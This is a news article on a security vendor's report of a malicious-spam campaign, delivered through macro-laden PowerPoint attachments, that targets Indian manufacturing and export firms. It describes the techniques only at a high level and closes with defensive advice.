Seqrite, a specialist provider of endpoint security and data protection solutions, has detected a new MalSpam (malicious spam) campaign, targeting the manufacturing and export sectors in India, according to a company release.

Seqrite researchers noted that malware actors are leveraging multiple sophisticated techniques in a campaign to bypass traditional defence mechanisms.

However, the cyber-security company claimed it is successfully detecting and blocking any such attempts using its patented Signatureless and Signature-based detection technology.

According to Seqrite, some of the common Remote Access Tools used by attackers are Agent Tesla, Remcos RAT, and NanoCore RAT.

Researchers at Seqrite have been following the tracks of these campaigns since April 2020 and have found that attackers don’t restrict themselves to a single geography or vertical, the company mentioned.

They also noticed that similar campaigns existed earlier as well that targeted varied organisations, including those managed by the government.

The attackers generally use publicly available systems such as Pastebin and Bitly to host their payloads, as it helps them hide behind legitimate services that remain undetected, Seqrite noted.

How does the attack begin?

The attack begins in the form of a phishing email sent to a genuine user. This contains MS Office PowerPoint files with a malicious Visual Basic for Applications (VBA) macro.

Cyber attackers use VBA programming in Microsoft Office macros as a medium to spread viruses, worms, and other forms of malware on a computer system.

Post execution, the malware takes advantage of pre-existing legitimate software to download malicious payload from Pastebin and continues to spread the infection.

Techniques used in the attack campaign

LoLBins or living-off-the-land binaries: Attackers abuse these built-in legitimate tools for malicious objectives as security products usually whitelist them.

Hosting payloads on legitimate file hosting service Pastebin: By hosting malicious payload on Pastebin, which is a web-based platform widely used for source code sharing, attackers can bypass network security controls and enter the computer system to steal critical data.

Bypass Anti-Malware Scan Interface (AMSI): Cyber attackers use a variety of techniques to bypass AMSI and potential detection by security products.

In memory payload execution (file-less technique) – In this method, a file-less infection directly loads malicious code into the memory of the system and evades anti-virus protection, as there is no file to be scanned and analysed.

The timely detection and blocking of such attack campaigns are essential for maintaining the integrity and trust in the businesses.

Seqrite suggested users exercise ample caution and avoid opening attachments and clicking on web links in unsolicited emails.

Businesses should consider disabling macros, keeping their Operating Systems (OS) updated, and have a full-fledged security solution installed on all the devices.